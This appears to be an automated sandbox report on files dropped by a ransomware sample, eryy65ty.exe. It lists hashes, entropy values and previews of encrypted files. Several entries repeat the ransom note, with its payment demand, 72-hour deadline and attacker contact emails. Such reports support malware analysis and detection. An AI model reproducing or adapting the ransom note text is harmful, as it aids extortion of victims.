                                                                                                                                            Preview:$0...Vd..Q=.........o....,.....p.qM....._......X...........<.....b[...3I.!......%.K .....7BLgamv.......n1s...CJ.....7.x.VJ3>..cW..E.z#...yy,]v...@.qg5.U...%2,Q.%.kF.....i..,.5.~.1...uD.E.4...q.....:.......J....'S3.G.u@...Q.9.Z.T.U....EmH.N.O.&.....V..,q|<8.}BY.Q5.....[.......zN{.DX.=.3.b5...3....Y.6.yp.<...;+....\{...C_J...j.#a.y.v.R...1.....N.......4...A..i(...iE..!.....e.,Ld...y|..`.d..".d..y:.if(...U1.........OAZC<DpN../.0.T.n.{I...=.........F..b...u.1@...F$Wb.6?..e.......p5.!....\......C..snKK...t./.1.y.N-.+W.r.Z9./.Y9.u.ed..D}..2...".....[...k...G....,....)&..@T.?~...9........+..NT?........e...N........5\.."l..0gY..B..........]..3~....K......(R.I.xp.j...S>..GR.^......>.....u.=....b...5S<...u.$..T...J..B{m...q..M._......$O..~wB.Y.K<..)iL.~ 8..6....{.Y..x[.~......mC......+.-8a.V.?.}.>...........il.8.*r...u.F~",I.8......x.c.{...>t.."kQ|.[..O...nZT.g]DB.2.D}...nEE.c`.M...."p...rD0&.C..dB=f..1..7zy.-.M#g.c..q.........mI..<$.k........<f5'....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864926295239201
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:zB8dQy7oBRgLwfPR3OC91W+PD+Ise1H6LHLsYrDhyNQ3GCne620PM7wGGP48:zMxoBCLwfp+aUW+brH7ENQ3GCe62mGGr
                                                                                                                                            MD5:40CAD163EECE7F679EA4EBFE3D6E2D44
                                                                                                                                            SHA1:53F6E225924B562838C1D80F7FAE295A4677017F
                                                                                                                                            SHA-256:C4BCEC2DA0B0C06C5E527151D42E94E710462DF12E87D9620F250F6DB651FE4C
                                                                                                                                            SHA-512:D1AD1E9694AE1A4078802D0D4E6A426AD58BC7588D0F3D5DE0C5740382F070FD039152B800982F711A6F90DA5838BFB0A10B19637E2DA0ABD6327D1316C114CF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Y...MW...r.X...E{Hb...B...2...z...(3.=(.t0....)"a<#....y."..........S....7.......Q.......i...o.x.Ry.iE....}rW.7.........>A.......T..,L.t....D.w.x..P..RF..3.....r....U..+.G.%o.:s.L..r.DD..x1W.....G..a.?0..O....&/.....H .~\.i.d..A..]I._..A..A/[._.e".mJ".n...._.|.k.%..,.{5.N3o......K..l.f$.J.......W....t..r'.).....3....[.K..B.j.%..5pr...We&....W...W>/..,..........&...m.........g..^[....s....E......o...J.y99xY...a9...X.R..y#@..... ..i.j>6N.:qh.C..4..w.....y.j..d.........3*.*Q.-W.bi..-....Y./.\....z.CRj.m(+.EI8...n.......;....r...R.......*......`...us.?....{.......W%..2....[..... ...[Yq.e.u.4....#w.x..........J-..r..)4[.............Ce...4iZZ.H.l. .%......O.4.x%..........'VC.fC.]7.+..Kr...>.....@.o.>.-E.I........{De...]qa(..T.*.m...~W..Y...d.JSA......K.A.s.R*)?.L..........b..-.|......Yw..h.c2".......~ZpVW.i.5..e...1.5f.M3.C.7......_.M.A. x|..4iI{..*...d..8..7.i..._y...pZ.6..]....o9.l.|.VYD4f. .. . .....P.....Hv.a*!<.sN.m.g.U.s..c.....u.'R..S.m......x.)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864926295239201
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:zB8dQy7oBRgLwfPR3OC91W+PD+Ise1H6LHLsYrDhyNQ3GCne620PM7wGGP48:zMxoBCLwfp+aUW+brH7ENQ3GCe62mGGr
                                                                                                                                            MD5:40CAD163EECE7F679EA4EBFE3D6E2D44
                                                                                                                                            SHA1:53F6E225924B562838C1D80F7FAE295A4677017F
                                                                                                                                            SHA-256:C4BCEC2DA0B0C06C5E527151D42E94E710462DF12E87D9620F250F6DB651FE4C
                                                                                                                                            SHA-512:D1AD1E9694AE1A4078802D0D4E6A426AD58BC7588D0F3D5DE0C5740382F070FD039152B800982F711A6F90DA5838BFB0A10B19637E2DA0ABD6327D1316C114CF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Y...MW...r.X...E{Hb...B...2...z...(3.=(.t0....)"a<#....y."..........S....7.......Q.......i...o.x.Ry.iE....}rW.7.........>A.......T..,L.t....D.w.x..P..RF..3.....r....U..+.G.%o.:s.L..r.DD..x1W.....G..a.?0..O....&/.....H .~\.i.d..A..]I._..A..A/[._.e".mJ".n...._.|.k.%..,.{5.N3o......K..l.f$.J.......W....t..r'.).....3....[.K..B.j.%..5pr...We&....W...W>/..,..........&...m.........g..^[....s....E......o...J.y99xY...a9...X.R..y#@..... ..i.j>6N.:qh.C..4..w.....y.j..d.........3*.*Q.-W.bi..-....Y./.\....z.CRj.m(+.EI8...n.......;....r...R.......*......`...us.?....{.......W%..2....[..... ...[Yq.e.u.4....#w.x..........J-..r..)4[.............Ce...4iZZ.H.l. .%......O.4.x%..........'VC.fC.]7.+..Kr...>.....@.o.>.-E.I........{De...]qa(..T.*.m...~W..Y...d.JSA......K.A.s.R*)?.L..........b..-.|......Yw..h.c2".......~ZpVW.i.5..e...1.5f.M3.C.7......_.M.A. x|..4iI{..*...d..8..7.i..._y...pZ.6..]....o9.l.|.VYD4f. .. . .....P.....Hv.a*!<.sN.m.g.U.s..c.....u.'R..S.m......x.)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861148022238716
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Q7DR5du6dMtNl7362ymoTkrQkHXeFUPUYu0obnIkITbQbRQfSY6Y5:qRD1SN536GoDkOF+oDIkITeQfSm5
                                                                                                                                            MD5:116AA8629F5FB192DD3ED464A18B903F
                                                                                                                                            SHA1:800435C0E12E9EC5CD7E5EE31A0A1B9BFA3D2F6D
                                                                                                                                            SHA-256:2D3619B6C575D8FE4CB66139B60E985586F60801B82A91A3F1DDD7343D78A977
                                                                                                                                            SHA-512:3A84FE9956C10F7CBE20B16B4974EE1AD1C278AA405D8FB39ED8A2AAC19910051BB2EE9C2769CB0B0304F3F4F610BC77657691F91052C3704172440C348F490B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.F..I..J.H....c..O..4.....V2..)..7...E..u...QE...^...1.;'...](.".6.w...lN..@..,y.<+...E.........E[....]..o.~*.l..;...1Y...q.@.?..Gg.&T.'.6:]..Q+Jt.,.=......^.....eM...J.-.............8%.3../D.>y....:{..?...=.vf.S_..J.....m%....x.Pv.%w`ij..R..5.R<w...e{...L]....k...r.....Mgd..8..'..vD.9-...#.......?..Gy..N_..'J.?3..m\B...h..5B....bV..x.B..q.V..[.P.m#...1B.T.m.Oqq...3w.b[.to....!..N.eK..W.jF......r..q..../..d....2$..W..b....e........x!...UF.......3Z.G.jQ.T.>...V.9..#d..?.Z.."...P_...M......>...o.}N....Eo...&...fVy'.7..$%[PC8Qk..C0Y.7...:..J..L...3)..-.A(...+!.d]..o P..._HB....>.G[.Z+@K.L.}5.]...F0.....\....6.b.,......B&K..P....!.%..n...(.x..Vx=...*......X.2...N.>s..<..L.....[..P....d...a......khyr.90...L.....O...9fr..!.@......k......ay.S. h....O.......5cu....w^.G.#)pw&...+3......up0.ez<..!.c........t0.z....U..(..8.....t>.p.Xq.....U.:.s......#........a.......+3J.........].........=n.9%v1#...B....t..q.......}....M........e..s..@.....f!.C
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861148022238716
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Q7DR5du6dMtNl7362ymoTkrQkHXeFUPUYu0obnIkITbQbRQfSY6Y5:qRD1SN536GoDkOF+oDIkITeQfSm5
                                                                                                                                            MD5:116AA8629F5FB192DD3ED464A18B903F
                                                                                                                                            SHA1:800435C0E12E9EC5CD7E5EE31A0A1B9BFA3D2F6D
                                                                                                                                            SHA-256:2D3619B6C575D8FE4CB66139B60E985586F60801B82A91A3F1DDD7343D78A977
                                                                                                                                            SHA-512:3A84FE9956C10F7CBE20B16B4974EE1AD1C278AA405D8FB39ED8A2AAC19910051BB2EE9C2769CB0B0304F3F4F610BC77657691F91052C3704172440C348F490B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.F..I..J.H....c..O..4.....V2..)..7...E..u...QE...^...1.;'...](.".6.w...lN..@..,y.<+...E.........E[....]..o.~*.l..;...1Y...q.@.?..Gg.&T.'.6:]..Q+Jt.,.=......^.....eM...J.-.............8%.3../D.>y....:{..?...=.vf.S_..J.....m%....x.Pv.%w`ij..R..5.R<w...e{...L]....k...r.....Mgd..8..'..vD.9-...#.......?..Gy..N_..'J.?3..m\B...h..5B....bV..x.B..q.V..[.P.m#...1B.T.m.Oqq...3w.b[.to....!..N.eK..W.jF......r..q..../..d....2$..W..b....e........x!...UF.......3Z.G.jQ.T.>...V.9..#d..?.Z.."...P_...M......>...o.}N....Eo...&...fVy'.7..$%[PC8Qk..C0Y.7...:..J..L...3)..-.A(...+!.d]..o P..._HB....>.G[.Z+@K.L.}5.]...F0.....\....6.b.,......B&K..P....!.%..n...(.x..Vx=...*......X.2...N.>s..<..L.....[..P....d...a......khyr.90...L.....O...9fr..!.@......k......ay.S. h....O.......5cu....w^.G.#)pw&...+3......up0.ez<..!.c........t0.z....U..(..8.....t>.p.Xq.....U.:.s......#........a.......+3J.........].........=n.9%v1#...B....t..q.......}....M........e..s..@.....f!.C
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.820693841572794
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:oyPZm1Z/VTokXaZskmYnvDQnferXHTrS5v9xa8xVmA89rR5Bk0iKHsFsK:oum1Z9Toc0skmY7QfQXHTrC/agUAArn8
                                                                                                                                            MD5:36E2010A1CCDF6DE40A684D1A1E77173
                                                                                                                                            SHA1:A96D81C5FEC7E5016FBC4CBFFBC32326C00F2A64
                                                                                                                                            SHA-256:DD2AA72898F8DFFC349D960E78CB1856D580CF1733980730ED3C8E7D1DBA2802
                                                                                                                                            SHA-512:15F4DF083C952493E01EBAF5ABF49A6EC67B93D9302CB071DE70441A9940F788DFDA2BCED910333F82AB90C7AF494B490E628D2BD65DFAED19BB394CD198EE7B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....."o.Z....o...H.E.......0.^i.+0{..R..h8.!.M..r.........xF3.k.kk|./xl...8..XmX.h..n.#..;.r.d."D...@..3;..b).....5:........K.....].|..)%......Z..y..!hToM.d...K6..us...(_.\.............wc.....0..#......[.7m.e....P.O..k.U..Y....*K..8U..v )o?.<.....$....[`.D.F:-F..U.k..."=3.^...|.`z..0...O./\6G.Q...0g..RU6.t`...F|...G..h.Q..#{.v.5.)...e.<.....d.<.&Z....a..Z?/$....k..^........z..b7T.%.V..L.)..N..V&K.0.......60F.....r..NnhJ.x...........g;2.;..cH9..^nj.....t,>i...r6>.G$=.x..%0W...q%x.].a.0v.OVG..(....>..T...w.[,.<..7..M.....s.JS.......b......>..)....Rl.........V.s*...>S.........P....F@....k.-4.].f\8Qh...Z.....E.)j._e.D..,z)e.g[....D..[..."9.ZPc.2I...Gt..L.Y..c..1........NJ...bIv1e2.,.UA..r3..3....1....EzI.b......lD.;d5....Q.....n.e1../.P..........v...P8...n.!..7$.L.WE6ZzY.[.3.!....k,....^.... .a..Q.......'_.K...R.Z.}....J..tK..@...X.$A.t....h~_-....NdK....}m....B...][....o}..*....@m..+...U7P+..{.w.Y...n;z..?....b.o@..-?..."..-..tK..o..'e..8.e
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.820693841572794
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:oyPZm1Z/VTokXaZskmYnvDQnferXHTrS5v9xa8xVmA89rR5Bk0iKHsFsK:oum1Z9Toc0skmY7QfQXHTrC/agUAArn8
                                                                                                                                            MD5:36E2010A1CCDF6DE40A684D1A1E77173
                                                                                                                                            SHA1:A96D81C5FEC7E5016FBC4CBFFBC32326C00F2A64
                                                                                                                                            SHA-256:DD2AA72898F8DFFC349D960E78CB1856D580CF1733980730ED3C8E7D1DBA2802
                                                                                                                                            SHA-512:15F4DF083C952493E01EBAF5ABF49A6EC67B93D9302CB071DE70441A9940F788DFDA2BCED910333F82AB90C7AF494B490E628D2BD65DFAED19BB394CD198EE7B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....."o.Z....o...H.E.......0.^i.+0{..R..h8.!.M..r.........xF3.k.kk|./xl...8..XmX.h..n.#..;.r.d."D...@..3;..b).....5:........K.....].|..)%......Z..y..!hToM.d...K6..us...(_.\.............wc.....0..#......[.7m.e....P.O..k.U..Y....*K..8U..v )o?.<.....$....[`.D.F:-F..U.k..."=3.^...|.`z..0...O./\6G.Q...0g..RU6.t`...F|...G..h.Q..#{.v.5.)...e.<.....d.<.&Z....a..Z?/$....k..^........z..b7T.%.V..L.)..N..V&K.0.......60F.....r..NnhJ.x...........g;2.;..cH9..^nj.....t,>i...r6>.G$=.x..%0W...q%x.].a.0v.OVG..(....>..T...w.[,.<..7..M.....s.JS.......b......>..)....Rl.........V.s*...>S.........P....F@....k.-4.].f\8Qh...Z.....E.)j._e.D..,z)e.g[....D..[..."9.ZPc.2I...Gt..L.Y..c..1........NJ...bIv1e2.,.UA..r3..3....1....EzI.b......lD.;d5....Q.....n.e1../.P..........v...P8...n.!..7$.L.WE6ZzY.[.3.!....k,....^.... .a..Q.......'_.K...R.Z.}....J..tK..@...X.$A.t....h~_-....NdK....}m....B...][....o}..*....@m..+...U7P+..{.w.Y...n;z..?....b.o@..-?..."..-..tK..o..'e..8.e
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.863449362799547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:NkaVWqT/Fu2+YORKjpOEYS/ewDZT2MAes1cPe8QzNDptHZHU2CXb:NNWqTFu2pORuq0J2MA8yRptHBy
                                                                                                                                            MD5:3FF966822795A1975DA111CF22A93610
                                                                                                                                            SHA1:3D994272E558E4DF53D89EF271619556B91185F7
                                                                                                                                            SHA-256:3AB9015B38C1871CB5F9A1BDFB241C46DF1C30C92DA929F7B1472B2E70CA9B2D
                                                                                                                                            SHA-512:AE084888D8AB10B3A52A46671DEEC5EBB6637A127FAA81CFA42D2AAD19C958E23B55A8A2FB64567A25B6FCE69B94BFA475355F9A866EEBD2A78E2A0BCB84C96C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.b....'p.BY;.f^......6E........!...V.."!.l.i.[......nPA..Q1.........l..iY.:_....%S.>..z..6.B..Oz.......I..u......<.*........... .D........(sp.......1m%.;J.c...K.'...1.).J")....zr..zi.....Z...%X......9..z.wK.~g...E .......?....G...k7"H..k..Zq...FI\..c....k...........,....\..T.K..E.jnO.Q.....`./......d..\.U....rC.a[......H..K...@#i.7...k":..............m~........5.h..F..4..C.})y.d..z...,.).i..[.:.G....F.5f2+`.+...A..4.U.3.X... .F.s...$W...0...q.2$...l...E.q)..b.o>...}>`.:....-..%.....C.Y#.$0_...L/9C..^.`........P..g.8%m7$.....p.(5..%.P.....A..<...[..1}.i..P.F....0C..K..\..!.......Uo.~&c.u..?.....'..D.... ...k.. ...,Q0ei...S...&.v<Z.....b}\.....>Bh.(..g...].e.....C.l..J...lS."..:.Fn.5...ba....x..N..1l.>...h=.CtB...q,;G.._._`..G.....p.@t.Dw..=.l..t...Uh..R...'i..c..\..=.6D}..}../...Y.IJ.R`[H.V..l+....=U.hwUG.!.(}~..m../.{t.....2.%3.eP.Q..........4........f@....[.b...N./......gzh-.....!6.s...].Xi...7..+4..[.....5..,>...mH.5..K.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.863449362799547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:NkaVWqT/Fu2+YORKjpOEYS/ewDZT2MAes1cPe8QzNDptHZHU2CXb:NNWqTFu2pORuq0J2MA8yRptHBy
                                                                                                                                            MD5:3FF966822795A1975DA111CF22A93610
                                                                                                                                            SHA1:3D994272E558E4DF53D89EF271619556B91185F7
                                                                                                                                            SHA-256:3AB9015B38C1871CB5F9A1BDFB241C46DF1C30C92DA929F7B1472B2E70CA9B2D
                                                                                                                                            SHA-512:AE084888D8AB10B3A52A46671DEEC5EBB6637A127FAA81CFA42D2AAD19C958E23B55A8A2FB64567A25B6FCE69B94BFA475355F9A866EEBD2A78E2A0BCB84C96C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.b....'p.BY;.f^......6E........!...V.."!.l.i.[......nPA..Q1.........l..iY.:_....%S.>..z..6.B..Oz.......I..u......<.*........... .D........(sp.......1m%.;J.c...K.'...1.).J")....zr..zi.....Z...%X......9..z.wK.~g...E .......?....G...k7"H..k..Zq...FI\..c....k...........,....\..T.K..E.jnO.Q.....`./......d..\.U....rC.a[......H..K...@#i.7...k":..............m~........5.h..F..4..C.})y.d..z...,.).i..[.:.G....F.5f2+`.+...A..4.U.3.X... .F.s...$W...0...q.2$...l...E.q)..b.o>...}>`.:....-..%.....C.Y#.$0_...L/9C..^.`........P..g.8%m7$.....p.(5..%.P.....A..<...[..1}.i..P.F....0C..K..\..!.......Uo.~&c.u..?.....'..D.... ...k.. ...,Q0ei...S...&.v<Z.....b}\.....>Bh.(..g...].e.....C.l..J...lS."..:.Fn.5...ba....x..N..1l.>...h=.CtB...q,;G.._._`..G.....p.@t.Dw..=.l..t...Uh..R...'i..c..\..=.6D}..}../...Y.IJ.R`[H.V..l+....=U.hwUG.!.(}~..m../.{t.....2.%3.eP.Q..........4........f@....[.b...N./......gzh-.....!6.s...].Xi...7..+4..[.....5..,>...mH.5..K.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855600937015754
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Vmv2E4ixwza+zw2hp47BKdHqETaolKDuneg/Seb7DaE0OtHBSTkguVerbZUuM:VcFx9byU8RqE7Kyl/S47DaEZHBSTlPP+
                                                                                                                                            MD5:99D2F1D33FC0832EBB49889627569D90
                                                                                                                                            SHA1:E28ED0E6DC62576E07844D7D0FE0C71B8C435C73
                                                                                                                                            SHA-256:6BC038951AC06492C001AA8A09D4AAE53935883D776FE6E2AB26DD712458F9A2
                                                                                                                                            SHA-512:AEE9F67969BADD37F64441A9C152C4780FE06DDF972970100FE89D4884C90FDFF0D7712D82CAECD4AAB29999C5A5B3FE67C08AA6A461171C679A3D3C49CC11C1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:?..M..8.&.x}..."9j...l.s'7..[#............|ze.....K..k.".Xb0lFl.>.l&S..a<...)...u.K.9.9.5.LyB.Jr++-.s.....l.0}..2.....5.S......+2.r?O...B.%..Y....8..Sm.N.3.2......S7.......qR*6...;,e.....jN.....K._.[._.Mj(.....(-i....B~.....J....a.P.C..Ty.V.'...9x.F.....R..&.....R..$p..-.u...D.....B.[-..Tw.......\...9...J.%.....&4....j...hM.l.......Q.vE..;t4Q.NR.....X?.A......@<..&...j.=..0$.1&w.a......1..Z....| .t..P...V.q...Q.l.G]. .B]+..........pS.$g.;!...Ts.,....2.9.g.....)...j......z`ar..........x..D.R.........j.. .l1.m.....Us.6..GI..A`..N.\.....'........X.+.mz.\...li!b....*..|\N..^.M..Jo.h.qV..W...C&82TIM!e....5.b..~...._.n1v...zL....l...k..-....o9..|kR......z.,.*..K`..u.}*i..._.s.5........P...SB.0..1.....$..T...gn........L.6.FD.................}....X..e.^`.mc......wU....R..C@5k.....+..Yy.Cb......xV.<... .e.h.....#T.eN.$.d..?9..D.?/S.!.~.....].M.K$oqn.cV_....+>T.D...M..W.A/w..5....a.;U8...@g...T.@X..D...y......K#H..v...%.3..'}..>...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855600937015754
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Vmv2E4ixwza+zw2hp47BKdHqETaolKDuneg/Seb7DaE0OtHBSTkguVerbZUuM:VcFx9byU8RqE7Kyl/S47DaEZHBSTlPP+
                                                                                                                                            MD5:99D2F1D33FC0832EBB49889627569D90
                                                                                                                                            SHA1:E28ED0E6DC62576E07844D7D0FE0C71B8C435C73
                                                                                                                                            SHA-256:6BC038951AC06492C001AA8A09D4AAE53935883D776FE6E2AB26DD712458F9A2
                                                                                                                                            SHA-512:AEE9F67969BADD37F64441A9C152C4780FE06DDF972970100FE89D4884C90FDFF0D7712D82CAECD4AAB29999C5A5B3FE67C08AA6A461171C679A3D3C49CC11C1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:?..M..8.&.x}..."9j...l.s'7..[#............|ze.....K..k.".Xb0lFl.>.l&S..a<...)...u.K.9.9.5.LyB.Jr++-.s.....l.0}..2.....5.S......+2.r?O...B.%..Y....8..Sm.N.3.2......S7.......qR*6...;,e.....jN.....K._.[._.Mj(.....(-i....B~.....J....a.P.C..Ty.V.'...9x.F.....R..&.....R..$p..-.u...D.....B.[-..Tw.......\...9...J.%.....&4....j...hM.l.......Q.vE..;t4Q.NR.....X?.A......@<..&...j.=..0$.1&w.a......1..Z....| .t..P...V.q...Q.l.G]. .B]+..........pS.$g.;!...Ts.,....2.9.g.....)...j......z`ar..........x..D.R.........j.. .l1.m.....Us.6..GI..A`..N.\.....'........X.+.mz.\...li!b....*..|\N..^.M..Jo.h.qV..W...C&82TIM!e....5.b..~...._.n1v...zL....l...k..-....o9..|kR......z.,.*..K`..u.}*i..._.s.5........P...SB.0..1.....$..T...gn........L.6.FD.................}....X..e.^`.mc......wU....R..C@5k.....+..Yy.Cb......xV.<... .e.h.....#T.eN.$.d..?9..D.?/S.!.~.....].M.K$oqn.cV_....+>T.D...M..W.A/w..5....a.;U8...@g...T.@X..D...y......K#H..v...%.3..'}..>...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.846542467910161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:qwMmm7L39qIdJ/F0KzbDkVPHdYKooBR4iRo+HlviusqR:qwM1f9jzo99HlvT
                                                                                                                                            MD5:64F7A9B35654CDA729634FCCDCE7CF03
                                                                                                                                            SHA1:087801002AC1AA4D9BBCA7FDA543A5DC38043B77
                                                                                                                                            SHA-256:17A6B6497432A6A020F3E69E2A27BB75791DE16ED6D522AA6DC0EBDD324FBDD0
                                                                                                                                            SHA-512:DD867D76A0C31357463EBA4AE7279EBFA5E640E7766DC34746E49F9DB70BD8AFE81E9CB5FCE5FF9D24730453C82D0791D31871693047BD345AA623EF20DAD4E3
